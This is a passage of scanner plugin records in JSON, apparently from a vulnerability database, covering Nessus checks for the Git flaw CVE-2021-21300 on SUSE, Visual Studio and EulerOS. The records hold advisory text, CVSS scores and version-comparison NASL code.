'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-web-2.31.1-10.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gitk-2.31.1-10.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'perl-Git-2.31.1-10.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'git / git-arch / git-core / git-credential-gnome-keyring / etc');\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:52:56", "description": "The remote SUSE Linux SLED15 / SLES15 host has packages installed that are affected by a vulnerability as referenced in the SUSE-SU-2021:2555-1 advisory.\n\n - Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are:\n 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5, 2.17.62.17.6. (CVE-2021-21300)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-30T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : git (SUSE-SU-2021:2555-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2022-01-20T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:git", "p-cpe:/a:novell:suse_linux:git-arch", "p-cpe:/a:novell:suse_linux:git-core", "p-cpe:/a:novell:suse_linux:git-cvs", "p-cpe:/a:novell:suse_linux:git-daemon", "p-cpe:/a:novell:suse_linux:git-doc", "p-cpe:/a:novell:suse_linux:git-email", "p-cpe:/a:novell:suse_linux:git-gui", "p-cpe:/a:novell:suse_linux:git-svn", "p-cpe:/a:novell:suse_linux:git-web", "p-cpe:/a:novell:suse_linux:gitk", "p-cpe:/a:novell:suse_linux:perl-Git", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2021-2555-1.NASL", "href": "https://www.tenable.com/plugins/nessus/152157", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2021:2555-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152157);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/20\");\n\n script_cve_id(\"CVE-2021-21300\");\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2021:2555-1\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : git (SUSE-SU-2021:2555-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLED15 / SLES15 host has packages installed that are affected by a vulnerability as referenced in\nthe SUSE-SU-2021:2555-1 advisory.\n\n - Git is an open-source distributed revision control system. In affected versions of Git a specially crafted\n repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may\n cause just-checked out script to be executed while cloning onto a case-insensitive file system such as\n NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters\n have to be configured for that. Git for Windows configures Git LFS by default, and is therefore\n vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a\n workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks\n false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are\n configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning\n repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are:\n 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5,\n 2.17.62.17.6. (CVE-2021-21300)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1168930\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1183026\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1183580\");\n # https://lists.suse.com/pipermail/sle-security-updates/2021-July/009228.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c407d1fe\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-21300\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21300\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Git LFS Clone Command Exec');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-arch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLED15 / SLES15', 'SUSE ' + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE ' + os_ver, cpu);\n\nvar sp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP3\", os_ver + \" SP\" + sp);\n\nvar pkgs = [\n {'reference':'git-core-2.31.1-10.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-basesystem-release-15.3'},\n {'reference':'git-core-2.31.1-10.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-basesystem-release-15.3'},\n {'reference':'perl-Git-2.31.1-10.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-basesystem-release-15.3'},\n {'reference':'perl-Git-2.31.1-10.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-basesystem-release-15.3'},\n {'reference':'git-2.31.1-10.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'},\n {'reference':'git-2.31.1-10.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'},\n {'reference':'git-arch-2.31.1-10.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'},\n {'reference':'git-arch-2.31.1-10.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'},\n {'reference':'git-cvs-2.31.1-10.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'},\n {'reference':'git-cvs-2.31.1-10.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'},\n {'reference':'git-daemon-2.31.1-10.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'},\n {'reference':'git-daemon-2.31.1-10.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'},\n {'reference':'git-doc-2.31.1-10.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'},\n {'reference':'git-doc-2.31.1-10.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'},\n {'reference':'git-email-2.31.1-10.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'},\n {'reference':'git-email-2.31.1-10.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'},\n {'reference':'git-gui-2.31.1-10.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'},\n {'reference':'git-gui-2.31.1-10.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'},\n {'reference':'git-svn-2.31.1-10.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'},\n {'reference':'git-svn-2.31.1-10.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'},\n {'reference':'git-web-2.31.1-10.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'},\n {'reference':'git-web-2.31.1-10.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'},\n {'reference':'gitk-2.31.1-10.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'},\n {'reference':'gitk-2.31.1-10.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (exists_check) {\n if (!rpm_exists(release:release, rpm:exists_check)) continue;\n if ('ltss' >< tolower(exists_check)) ltss_caveat_required = TRUE;\n }\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'git / git-arch / git-core / git-cvs / git-daemon / git-doc / git-email / etc');\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-12T14:24:44", "description": "The Microsoft Visual Studio Products are missing a security update. It is, therefore, affected by the following vulnerability:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-21300)", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-12T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft Visual Studio Products (March 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2022-06-27T00:00:00", "cpe": ["cpe:/a:microsoft:visual_studio"], "id": "SMB_NT_MS21_MAR_VISUAL_STUDIO.NASL", "href": "https://www.tenable.com/plugins/nessus/147749", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147749);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/27\");\n\n script_cve_id(\"CVE-2021-21300\");\n script_xref(name:\"IAVA\", value:\"2021-A-0133-S\");\n\n script_name(english:\"Security Updates for Microsoft Visual Studio Products (March 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Visual Studio Products are missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Visual Studio Products are missing a security\nupdate. It is, therefore, affected by the following\nvulnerability:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-21300)\");\n # https://docs.microsoft.com/en-us/visualstudio/releasenotes/vs2017-relnotes#15.9.34\n script_set_attribute(attribute:\"see_also\", value:\"https://www.nessus.org/u?35639538\");\n # https://docs.microsoft.com/en-us/visualstudio/releases/2019/release-notes-v16.7#16.7.13\n script_set_attribute(attribute:\"see_also\", value:\"https://www.nessus.org/u?59306b22\");\n # https://docs.microsoft.com/en-us/visualstudio/releases/2019/release-notes-v16.8#16.8.7\n script_set_attribute(attribute:\"see_also\", value:\"https://www.nessus.org/u?ceb97f0f\");\n # https://docs.microsoft.com/en-us/visualstudio/releases/2019/release-notes#16.9.1\n script_set_attribute(attribute:\"see_also\", value:\"https://www.nessus.org/u?2e4fedc9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue:\n - Update 15.9.34 for Visual Studio 2017\n - Update 16.7.13 for Visual Studio 2019\n - Update 16.8.7 for Visual Studio 2019\n - Update 16.9.1 for Visual Studio 2019\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21300\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Git LFS Clone Command Exec');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:visual_studio\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ms_bulletin_checks_possible.nasl\", \"microsoft_visual_studio_installed.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\", \"installed_sw/Microsoft Visual Studio\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('install_func.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\n\nget_kb_item_or_exit('installed_sw/Microsoft Visual Studio');\n\nport = kb_smb_transport();\nappname = 'Microsoft Visual Studio';\ninstalls = get_installs(app_name:appname, exit_if_not_found:TRUE);\nreport = '';\n\nforeach install (installs[1])\n{\n version = install['version'];\n path = install['path'];\n prod = install['product_version'];\n fix = '';\n\n # https://docs.microsoft.com/en-us/visualstudio/install/visual-studio-build-numbers-and-release-dates?view=vs-2017\n #\n # VS 2017\n if (prod == '2017')\n {\n fix = '15.9.28307.1440';\n\n if (ver_compare(ver: version, fix: fix, strict:FALSE) < 0)\n {\n report +=\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n }\n }\n # https://docs.microsoft.com/en-us/visualstudio/install/visual-studio-build-numbers-and-release-dates?view=vs-2019\n #\n # VS 2019 Version 16.4\n else if (prod == '2019' && version =~ \"^16\\.[0-4]\\.\")\n {\n fix = '16.4.31026.101';\n if (ver_compare(ver: version, fix: fix, strict:FALSE) < 0)\n {\n report +=\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n }\n }\n # VS 2019 Version 16.7\n else if (prod == '2019' && version =~ \"^16\\.[5-7]\\.\")\n {\n fix = '16.7.31026.100';\n if (ver_compare(ver: version, fix: fix, strict:FALSE) < 0)\n {\n report +=\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n }\n }\n # VS 2019 Version 16.8\n else if (prod == '2019' && version =~ \"^16\\.8\\.\")\n {\n fix = '16.8.31025.109';\n if (ver_compare(ver: version, fix: fix, strict:FALSE) < 0)\n {\n report +=\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n }\n }\n # VS 2019 Version 16.9\n else if (prod == '2019' && version =~ \"^16\\.9\\.\")\n {\n fix = '16.9.31105.61';\n if (ver_compare(ver: version, fix: fix, strict:FALSE) < 0)\n {\n report +=\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n }\n }\n}\n\nhotfix_check_fversion_end();\n\nif (empty(report))\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n\nsecurity_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:35:13", "description": "According to the versions of the git packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are:\n 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5, 2.17.62.17.6. (CVE-2021-21300)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-01-06T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 3.0.2.6 : git (EulerOS-SA-2021-2887)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2022-01-20T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:git", "p-cpe:/a:huawei:euleros:perl-Git", "cpe:/o:huawei:euleros:uvp:3.0.2.6"], "id": "EULEROS_SA-2021-2887.NASL", "href": "https://www.tenable.com/plugins/nessus/156521", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156521);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/20\");\n\n script_cve_id(\"CVE-2021-21300\");\n\n script_name(english:\"EulerOS Virtualization 3.0.2.6 : git (EulerOS-SA-2021-2887)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the git packages installed, the EulerOS Virtualization installation on the remote host is\naffected by the following vulnerabilities :\n\n - Git is an open-source distributed revision control system. In affected versions of Git a specially crafted\n repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may\n cause just-checked out script to be executed while cloning onto a case-insensitive file system such as\n NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters\n have to be configured for that. Git for Windows configures Git LFS by default, and is therefore\n vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a\n workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks\n false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are\n configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning\n repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are:\n 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5,\n 2.17.62.17.6. (CVE-2021-21300)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-2887\n 